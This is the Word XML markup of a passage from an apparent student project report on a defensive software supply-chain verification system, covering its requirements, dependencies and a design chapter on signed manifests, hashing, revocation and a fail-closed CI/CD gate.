        <w:t>FR5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provide a CI/CD gate command returning exit code 0 (deploy) or 1 (block).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Log every event to SQLite and display it on a web dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulate the attacks, run a 14-step live demonstration, and run nine automated test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.3 Non-functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Performance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> verification should add negligible time to a CI run (milliseconds).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reliability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> zero false acceptances of tampered or unauthorised artifacts in controlled tests; fail-closed on any error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Portability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python 3.10+ on Windows, Linux or macOS; only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>cryptography</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Usability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> single commands for every step, readable console reports, and a web dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.4 Hardware and Software Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Hardware and software requirements</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Item</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Requirement</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Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Any x86-64 or ARM64 PC or laptop, 4 GB RAM or more</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Operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Windows 10/11, Linux or macOS</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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python 3.10 or later</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Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cryptography</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Ed25519, PEM/PKCS#8 serialisation) &gt;= 41.0; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;= 3.0 (dashboard); standard library </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hashlib</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>json</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Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLite database </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>audit/supply_chain_audit.db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>; JSON manifests, provenance and CRL</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Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Any modern browser for the dashboard at http://127.0.0.1:5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DESIGN AND IMPLEMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This chapter presents our security mechanism, which is the core of the project. For each component we explain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>what it does</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why it exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which vulnerability from Chapter 3 it removes), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>how it is implemented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the submitted code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.1 Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Zero trust in distribution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the storage bucket, CDN and network are assumed hostile. Trust comes only from the vendor's signature, checked with a public key the customer already trusts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Integrity AND authenticity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA-256 detects any change; Ed25519 proves the vendor approved the manifest that carries the expected digest. Both are required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Defence in depth:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> revocation, admission policy, signature, digest and provenance are independent checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fail closed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a missing file, malformed manifest, unknown key or any failed check yields BLOCK, never a silent deploy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Accountability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> every signing, blocking and deployment decision is logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.2 Security Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4464000" cy="5710025"/>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464000" cy="5710025"/>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5.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security architecture of the implemented supply chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.1 shows three zones. In the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vendor secure zone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, the developer's code is built, the artifact is hashed and its provenance recorded (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>build.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>), and the release manifest is signed with the vendor's private Ed25519 key (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sign.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>key_manager.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> manages keys and the revocation list. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>untrusted distribution zone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is where the artifact, signed manifest and provenance are stored and downloaded; the prototype represents it with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>artifacts/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder. TLS 1.3 protects the transport in a real deployment, but the design deliberately does not rely on it. In the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>customer CI/CD zone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>security_gate.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> invokes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>verify.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, which performs six sequential checks using the trusted public keys, the CRL and the admission policy. It then deploys or blocks, and writes the result to the audit database shown on the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
